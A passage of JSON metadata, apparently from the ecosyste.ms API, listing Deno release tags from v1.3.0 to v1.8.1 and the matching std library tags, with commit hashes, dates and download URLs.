t":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G